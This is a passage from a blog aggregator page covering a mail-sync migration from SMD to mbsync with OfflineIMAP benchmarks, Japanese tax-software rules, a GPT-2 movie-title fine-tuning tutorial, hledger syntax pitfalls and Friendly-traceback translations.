===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.367 0.065 2.220 2.376 2.458 user 0.793 0.047 0.731 0.776 0.871 sys 0.426 0.040 0.364 0.434 0.476

With SSH:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.515 0.088 2.274 2.532 2.594 user 0.753 0.043 0.645 0.766 0.804 sys 0.328 0.045 0.212 0.340 0.393

Basically: 200ms slower. Tolerable.

Migrating from SMD

The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:

  1. install isync, with the patch:

    dpkg -i isync_1.4.3-1.1~_amd64.deb
  2. copy all files over from previous workstation to avoid a full resync (optional):

    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
  3. rename all files to match new hostname (optional):

    find Maildir-mbsync/ -type f -name '*.angela,*' -print0 | rename -0 's/\.angela,/\.curie,/'
  4. trash the notmuch database (optional):

    rm -rf Maildir-mbsync/.notmuch/xapian/
  5. disable all smd and notmuch services:

    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
  6. do one last sync with smd:

    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
  7. backup notmuch on the client and server:

    notmuch dump | pv > notmuch.dump
  8. backup the maildir on the client and server:

    cp -al Maildir Maildir-bak
  9. create the SSH key:

    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync cat .ssh/id_ed25519_mbsync.pub
  10. add to .ssh/authorized_keys on the server, like this:

    command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...

  11. move old files aside, if present:

    mv Maildir Maildir-smd
  12. move new files in place (CRITICAL SECTION BEGINS!):

    mv Maildir-mbsync Maildir
  13. run a test sync, only pulling changes:

    mbsync --create-near --remove-none --expunge-none --noop anarcat-register

  14. if that works well, try with all mailboxes:

    mbsync --create-near --remove-none --expunge-none --noop -a

  15. if that works well, try again with a full sync:

    mbsync register mbsync -a

  16. reindex and restore the notmuch database, this should take ~25 minutes:

    notmuch new pv notmuch.dump | notmuch restore
  17. enable the systemd services and retire the smd-* services:

    systemctl --user enable mbsync.timer notmuch-new.service systemctl --user start mbsync.timer rm ~/.config/systemd/user/smd* systemctl daemon-reload

During the migration, notmuch helpfully told me the full list of those lost messages:

[...] Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com [...] Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47 Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562 Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13 [...]

As detailed in the crash report, all of those were actually innocuous and could be ignored.

Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:

nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.). nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.

While a reindexing on top of an existing database was going twice as slow, at about 120 files/sec.

Current config file

Putting it all together, I ended up with the following configuration file:

SyncState * Sync All # IMAP side, AKA "Far" IMAPAccount anarcat-imap Host imap.anarc.at User anarcat PassCmd "pass imap.anarc.at" SSLType IMAPS CertificateFile /etc/ssl/certs/ca-certificates.crt IMAPAccount anarcat-tunnel Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap" IMAPStore anarcat-remote Account anarcat-tunnel # Maildir side, AKA "Near" MaildirStore anarcat-local # Maildir/top/sub/sub #SubFolders Verbatim # Maildir/.top.sub.sub SubFolders Maildir++ # Maildir/top/.sub/.sub # SubFolders legacy # The trailing "/" is important #Path ~/Maildir-mbsync/ Inbox ~/Maildir/ # what binds Maildir and IMAP Channel anarcat Far :anarcat-remote: Near :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything #Patterns * Patterns * !register !.register # Automatically create missing mailboxes, both locally and on the server Create Both #Create Near # Sync the movement of messages between folders and deletions, add after making sure the sync works Expunge Both # Propagate mailbox deletion Remove both IMAPAccount anarcat-register-imap Host imap.anarc.at User register PassCmd "pass imap.anarc.at-register" SSLType IMAPS CertificateFile /etc/ssl/certs/ca-certificates.crt IMAPAccount anarcat-register-tunnel Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap" IMAPStore anarcat-register-remote Account anarcat-register-tunnel MaildirStore anarcat-register-local SubFolders Maildir++ Inbox ~/Maildir/.register/ Channel anarcat-register Far :anarcat-register-remote: Near :anarcat-register-local: Create Both Expunge Both Remove both

Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP

I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that.

It also kind of died in a fire when Python 2 stop being maintained. The main author moved on to a different project, imapfw which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync

The first thing that happened on a full sync is this crash:

Copy message from RemoteAnarcat:junk: ERROR: Copying message 30624 [acc: Anarcat] decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Thread 'Copy message from RemoteAnarcat:junk' terminated with exception: Traceback (most recent call last): File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode for c in binary.decode(): AttributeError: 'memoryview' object has no attribute 'decode' The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run Thread.run(self) File "/usr/lib/python3.9/threading.py", line 892, in run self._target(*self._args, **self._kwargs) File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1]) File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes return self.parser.parsestr(text, headersonly) File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr return self.parse(StringIO(text), headersonly=headersonly) File "/usr/lib/python3.9/email/parser.py", line 56, in parse feedparser.feed(data) File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed self._call_parse() File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse self._parse() File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen if self._cur.get_content_type() == 'message/delivery-status': File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type value = self.get('content-type', missing) File "/usr/lib/python3.9/email/message.py", line 471, in get return self.policy.header_fetch_parse(k, v) File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse return self.header_factory(name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__ return self[name](name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__ cls.parse(value, kwds) File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse kwds['parse_tree'] = parse_tree = cls.value_parser(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header ctype.append(parse_mime_parameters(value[1:])) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters token, value = get_parameter(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter token, value = get_value(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value token, value = get_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string token, value = get_bare_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string token, value = get_encoded_word(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word text, charset, lang, defects = _ew.decode('=?' + tok + '?=') File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode string = bstring.decode(charset) AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception: thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat') ERROR: Exceptions occurred during the run! ERROR: Copying message 30624 [acc: Anarcat] decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1]) File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes return self.parser.parsestr(text, headersonly) File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr return self.parse(StringIO(text), headersonly=headersonly) File "/usr/lib/python3.9/email/parser.py", line 56, in parse feedparser.feed(data) File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed self._call_parse() File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse self._parse() File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen if self._cur.get_content_type() == 'message/delivery-status': File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type value = self.get('content-type', missing) File "/usr/lib/python3.9/email/message.py", line 471, in get return self.policy.header_fetch_parse(k, v) File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse return self.header_factory(name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__ return self[name](name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__ cls.parse(value, kwds) File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse kwds['parse_tree'] = parse_tree = cls.value_parser(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header ctype.append(parse_mime_parameters(value[1:])) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters token, value = get_parameter(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter token, value = get_value(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value token, value = get_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string token, value = get_bare_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string token, value = get_encoded_word(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word text, charset, lang, defects = _ew.decode('=?' + tok + '?=') File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode string = bstring.decode(charset) Folder junk [acc: Anarcat]: Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk Command exited with non-zero status 100 5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k 96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps

That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance

The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:

*** Finished account 'Anarcat' in 511:12 ERROR: Exceptions occurred during the run! ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes). AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap raise OfflineImapError( ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes). AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap raise OfflineImapError( ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686' Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap raise OfflineImapError(reason, severity) Command exited with non-zero status 1 8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k 56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps "offlineimap -o " took 8 hours 31 mins 15 secs

This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude!

Now that we have a full sync, we can test incremental synchronization. That is also much slower:

===> multitime results 1: sh -c "offlineimap -o || true" Mean Std.Dev. Min Median Max real 24.639 0.513 23.946 24.526 25.708 user 23.912 0.473 23.404 23.795 24.947 sys 1.743 0.105 1.607 1.729 2.002

That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check

That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I Haven't tested that theory.

The OfflineIMAP mail spool is missing quite a few messages as well:

anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*' | wc -l 381463 anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385247

... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate

Those are all the options I have considered, in alphabetical order

  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox,NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc. discarded because no (real) support for keeping mail on the server, and written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. not evaluated because it seems awfully complex to setup
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above

Most projects were not evaluated due to lack of time.

Conclusion

I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's on par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response.

Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have ran out of time on this project.

Categories: FLOSS Project Planets

Junichi Uekawa: Tax related software.

Planet Debian - Sun, 2021-11-21 02:40
Tax related software. Tax related work in Japan is defined to be exclusive for licensed Tax Accountants. I wondered what it means for Tax related software and I was uncomfortable what it means to make one, or even if was elibible for a fine. I've looked up and the national tax agency had a FAQ entry. 2 非税理士により行うことが禁止される税理士業務 which stated that making and selling software for tax filing is allowed for non-Tax Accountants. So if they say so, maybe it's safe for me to write and distribute tax related software. One caveat is that tax related software is only applicable in individual countries but since it's something I care about and use every year, it's probably ok.

Categories: FLOSS Project Planets

John Ludhi/nbshare.io: Movie Name Generation Using GPT-2

Planet Python - Sat, 2021-11-20 20:38

Movie Name Generation Using GPT-2

Since its reveal in 2017 in the popular paper Attention Is All You Need (https://arxiv.org/abs/1706.03762), the Transformer quickly became the most popular model in NLP. The ability to process text in a non-sequential way (as opposed to RNNs) allowed for training of big models. The attention mechanism it introduced proved extremely useful in generalizing text.

Following the paper, several popular transformers surfaced, the most popular of which is GPT. GPT models are developed and trained by OpenAI, one of the leaders in AI research. The latest release of GPT is GPT-3, which has 175 billion parameters. The model was very advanced to the point where OpenAI chose not to open-source it. People can access it through an API after a signup process and a long queue.

However, GPT-2, their previous release is open-source and available on many deep learning frameworks.

In this excercise, we use Huggingface and PyTorch to fine-tune a GPT-2 model for movie name generation.

Overview:

  • Imports and Data Loading
  • Data Preprocessing
  • Setup and Training
  • Movie Name Generation
  • Model Saving and Loading
Imports and Data Loading

Please use pip install {library name} in order to install the libraries below if they are not installed. "transformers" is the Huggingface library.

In [2]: import re import pandas as pd import numpy as np import torch from torch.utils.data import Dataset, DataLoader from transformers import AutoTokenizer, AutoModelWithLMHead import torch.optim as optim

We set the device to enable GPU processing.

In [3]: device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') device Out[3]: device(type='cuda', index=0) Data Preprocessing In [5]: movies_file = "movies.csv"

Since the file is in CSV format, we use pandas.read_csv() to read the file

In [7]: raw_df = pd.read_csv(movies_file) raw_df Out[7]: movieId title genres 0 1 Toy Story (1995) Adventure|Animation|Children|Comedy|Fantasy 1 2 Jumanji (1995) Adventure|Children|Fantasy 2 3 Grumpier Old Men (1995) Comedy|Romance 3 4 Waiting to Exhale (1995) Comedy|Drama|Romance 4 5 Father of the Bride Part II (1995) Comedy ... ... ... ... 9737 193581 Black Butler: Book of the Atlantic (2017) Action|Animation|Comedy|Fantasy 9738 193583 No Game No Life: Zero (2017) Animation|Comedy|Fantasy 9739 193585 Flint (2017) Drama 9740 193587 Bungo Stray Dogs: Dead Apple (2018) Action|Animation 9741 193609 Andrew Dice Clay: Dice Rules (1991) Comedy

9742 rows × 3 columns

We can see that we have 9742 movie names in the title column. Since the other columns are not useful for us, we will only keep the title column.

In [29]: movie_names = raw_df['title'] movie_names Out[29]: 0 Toy Story (1995) 1 Jumanji (1995) 2 Grumpier Old Men (1995) 3 Waiting to Exhale (1995) 4 Father of the Bride Part II (1995) ... 9737 Black Butler: Book of the Atlantic (2017) 9738 No Game No Life: Zero (2017) 9739 Flint (2017) 9740 Bungo Stray Dogs: Dead Apple (2018) 9741 Andrew Dice Clay: Dice Rules (1991) Name: title, Length: 9742, dtype: object

As seen, the movie names all end with the release year. While it may be interesting to keep the years in the names and let the model output years for generated movies, we can safely assume it does not help the model in understanding movie names.

We remove them with a simple regex expression:

In [30]: movie_list = list(movie_names) In [31]: def remove_year(name): return re.sub("\([0-9]+\)", "", name).strip() In [32]: movie_list = [remove_year(name) for name in movie_list]

The final movie list looks ready for training. Notice that we do not need to tokenize or process the text any further since GPT2 comes with its own tokenizer that handles text in the approriate way.

In [34]: movie_list[:5] Out[34]: ['Toy Story', 'Jumanji', 'Grumpier Old Men', 'Waiting to Exhale', 'Father of the Bride Part II']

However, we should still acquire a fixed length input. We use the average movie name length in words in order to place a safe max length.

In [39]: avg_length = sum([len(name.split()) for name in movie_list])/len(movie_list) avg_length Out[39]: 3.2991172243892426

Since the average movie name length in words is 3.3, we can assume that a max length of 10 will cover most of the instances.

In [40]: max_length = 10 Setup and Training

Before creating the dataset, we download the model and the tokenizer. We need the tokenizer in order to tokenize the data.

In [120]: tokenizer = AutoTokenizer.from_pretrained("gpt2") model = AutoModelWithLMHead.from_pretrained("gpt2") /usr/local/lib/python3.7/dist-packages/transformers/models/auto/modeling_auto.py:698: FutureWarning: The class `AutoModelWithLMHead` is deprecated and will be removed in a future version. Please use `AutoModelForCausalLM` for causal language models, `AutoModelForMaskedLM` for masked language models and `AutoModelForSeq2SeqLM` for encoder-decoder models. FutureWarning,

We send the model to the device and initialize the optimizer.

In [121]: model = model.to(device) In [122]: optimizer = optim.AdamW(model.parameters(), lr=3e-4)

According to the GPT-2 paper, to fine-tune the model, use a task designator.

For our purposes, the designator is simply "movie: ". This will be added to the beginning of every example.

To correctly pad and truncate the instances, we find the number of tokens used by this designator:

In [108]: tokenizer.encode("movie: ") Out[108]: [41364, 25, 220] In [109]: extra_length = len(tokenizer.encode("movie: "))

We create a simple dataset that extends the PyTorch Dataset class:

In [110]: class MovieDataset(Dataset): def __init__(self, tokenizer, init_token, movie_titles, max_len): self.max_len = max_len self.tokenizer = tokenizer self.eos = self.tokenizer.eos_token self.eos_id = self.tokenizer.eos_token_id self.movies = movie_titles self.result = [] for movie in self.movies: # Encode the text using tokenizer.encode(). We ass EOS at the end tokenized = self.tokenizer.encode(init_token + movie + self.eos) # Padding/truncating the encoded sequence to max_len padded = self.pad_truncate(tokenized) # Creating a tensor and adding to the result self.result.append(torch.tensor(padded)) def __len__(self): return len(self.result) def __getitem__(self, item): return self.result[item] def pad_truncate(self, name): name_length = len(name) - extra_length if name_length < self.max_len: difference = self.max_len - name_length result = name + [self.eos_id] * difference elif name_length > self.max_len: result = name[:self.max_len + 2]+[self.eos_id] else: result = name return result

Then, we create the dataset:

In [111]: dataset = MovieDataset(tokenizer, "movie: ", movie_list, max_length)

Using a batch_size of 32, we create the dataloader:

In [112]: dataloader = DataLoader(dataset, batch_size=32, shuffle=True, drop_last=True)

GPT-2 is capable of several tasks, including summarization, generation, and translation. To train for generation, use the same as input as labels:

In [114]: def train(model, optimizer, dl, epochs): for epoch in range(epochs): for idx, batch in enumerate(dl): with torch.set_grad_enabled(True): optimizer.zero_grad() batch = batch.to(device) output = model(batch, labels=batch) loss = output[0] loss.backward() optimizer.step() if idx % 50 == 0: print("loss: %f, %d"%(loss, idx))

When training a language model, it is easy to overfit the model. This is due to the fact that there is no clear evaluation metric. With most tasks, one can use cross-validation to guarantee not to overfit. For our purposes, we only use 2 epochs for training

In [123]: train(model=model, optimizer=optimizer, dl=dataloader, epochs=2) loss: 9.313371, 0 loss: 2.283597, 50 loss: 1.748692, 100 loss: 2.109853, 150 loss: 1.902950, 200 loss: 2.051265, 250 loss: 2.213011, 300 loss: 1.370941, 0 loss: 1.346577, 50 loss: 1.278894, 100 loss: 1.373716, 150 loss: 1.419072, 200 loss: 1.505586, 250 loss: 1.493220, 300

The loss decreased consistently, which means that the model was learning.

Movie Name Generation

In order to verify, we generate 20 movie names that are not existent in the movie list.

The generation methodology is as follows:

  1. The task designator is initially fed into the model
  2. A choice from the top-k choices is selected. A common question is why not use the highest ranked choice always. The simple answer is that introducing randomness helps the model create different outputs. There are several sampling methods in the literature, such as top-k and nucleus sampling. Im this example, we use top-k, where k = 9. K is a hyperparameter that improves the performance with tweaking. Feel free to play around with it to see the effects.
  3. The choice is added to the sequence and the current sequence is fed to the model.
  4. Repeat steps 2 and 3 until either max_len is achieved or the EOS token is generated.
In [116]: def topk(probs, n=9): # The scores are initially softmaxed to convert to probabilities probs = torch.softmax(probs, dim= -1) # PyTorch has its own topk method, which we use here tokensProb, topIx = torch.topk(probs, k=n) # The new selection pool (9 choices) is normalized tokensProb = tokensProb / torch.sum(tokensProb) # Send to CPU for numpy handling tokensProb = tokensProb.cpu().detach().numpy() # Make a random choice from the pool based on the new prob distribution choice = np.random.choice(n, 1, p = tokensProb) tokenId = topIx[choice][0] return int(tokenId) In [125]: def model_infer(model, tokenizer, init_token, max_length=10): # Preprocess the init token (task designator) init_id = tokenizer.encode(init_token) result = init_id init_input = torch.tensor(init_id).unsqueeze(0).to(device) with torch.set_grad_enabled(False): # Feed the init token to the model output = model(init_input) # Flatten the logits at the final time step logits = output.logits[0,-1] # Make a top-k choice and append to the result result.append(topk(logits)) # For max_length times: for i in range(max_length): # Feed the current sequence to the model and make a choice input = torch.tensor(result).unsqueeze(0).to(device) output = model(input) logits = output.logits[0,-1] res_id = topk(logits) # If the chosen token is EOS, return the result if res_id == tokenizer.eos_token_id: return tokenizer.decode(result) else: # Append to the sequence result.append(res_id) # IF no EOS is generated, return after the max_len return tokenizer.decode(result)

Generating 20 unique movie names:

In [131]: results = set() while len(results) < 20: name = model_infer(model, tokenizer, "movie:").replace("movie: ", "").strip() if name not in movie_list: results.add(name) print(name) The Final Days American Psycho II The Last Christmas Last Kiss, The (Koumashi- American Pie Presents: The Last Christmas American Psycho II My Best Fiend The Final Cut Last Summer Last Night's Night I Love You, I Love You My Best Fiend American Pie Presents: American Pie 2 I'm Sorry I Feel That Way American Pie Presents: The Next Door, The ( Last Summer, The I'll Do Anything... Any... My Girl the Hero My Best Fiend (La vie en f The Man with the Golden Arm The Last Train Home I'm Here To Help

As shown, the movie names look realistic, meaning that the model learned how to generate movie names correctly.

Model Saving and Loading

PyTorch makes it very easy to save the model:

In [ ]: torch.save(model.state_dict(), "movie_gpt.pth")

And, if you need to load the model in the future for quick inference without having to train:

In [ ]: model.load_state_dict(torch.load("movie_gpt.pth"))

In this tutorial, we learnt how to fine-tune the Huggingface GPT model to perform movie name generation. The same methodology can be applied to any language model available on https://huggingface.co/models

Categories: FLOSS Project Planets

Jonathan Dowland: hledger footguns

Planet Debian - Sat, 2021-11-20 16:03

I wrote in budgeting tools that I was taking a look at Plain Text Accounting and in particular, hledger. My Jury's still out on the tools, but in the time I've been looking at them I've come across a couple of foot-guns I thought it was worth writing down.

hledger's ledger format is derived from that of its predecessor ledger, and so some of the problems might be inherited.

1. significant white space delimiters

The basic syntax for a transaction looks like this

2020-03-15 client payment assets:checking $ 2000 income:consulting $-2000

There's some significant white space delimiters in play. The most subtle is what separates the account names from the values: it is two or more spaces. A single space, and the value is treated as part of the account name. For some reason I hit this frequently with trying to encode opening balances: the account name used as the source of the initial balances is something not otherwise generally referred to again (something like equity:opening balances) and the transaction amount is inferred where possible, so I ended up with a bunch of accounts named equity:opening balances £100 and similar.

2. flexible decimal delimiter

The value of transactions can be interspersed with commas and periods to make it more readable: e.g. $2000 could be written as $2,000. Different locales have different conventions here: It seems some(/most/all?) of Europe use periods to separate out the units and a comma to delimit the fractional part, whereas the US and the UK do the opposite. There is no built-in association between the currency symbol you are using and the period/comma convention: it's quite possible to accidentally write a number which is interpreted differently to how you intended, and it doesn't matter if you are using $ or £ etc.

3. new syntax has unexpected results in old versions

Finally, my favourite. hledger has a notion of rules that can be used to match transactions when importing from CSV. The format looks like this:

if (match rule) & (another rule) account1 some:account:from account2 some:account:to

By default, multiple rules in sequence like above are OR'd: any of them can match. The & prefix switches the behaviour to AND. But, & is a relatively new addition: it's not supported in 1.18.1, the version in Debian stable, which upstream released in June 2020. In prior versions the & prefix is not a syntax error, or at least, not one that's reported: it's silently ignored; meaning, the line with the & does nothing, and any of the other rules in the set will match. This is easy to miss, and means imports could be incorrectly posted.

Categories: FLOSS Project Planets

Andre Roberge: Friendly-traceback en español

Planet Python - Sat, 2021-11-20 10:00

 Friendly and Friendly-traceback are now partially available in Spanish thanks to the work of Mrtín René (https://github.com/martinvilu).

You can have a look at the Spanish translations in context for SyntaxErrors and for other exceptions.

If you are interested in contributing to translations, please join this discussion and have a look at this online collaborative site.


Update: Someone just volunteered to help with the Italian translation. Note that there are more than 600 pieces of text to translate and that more volunteers can help!

Categories: FLOSS Project Planets

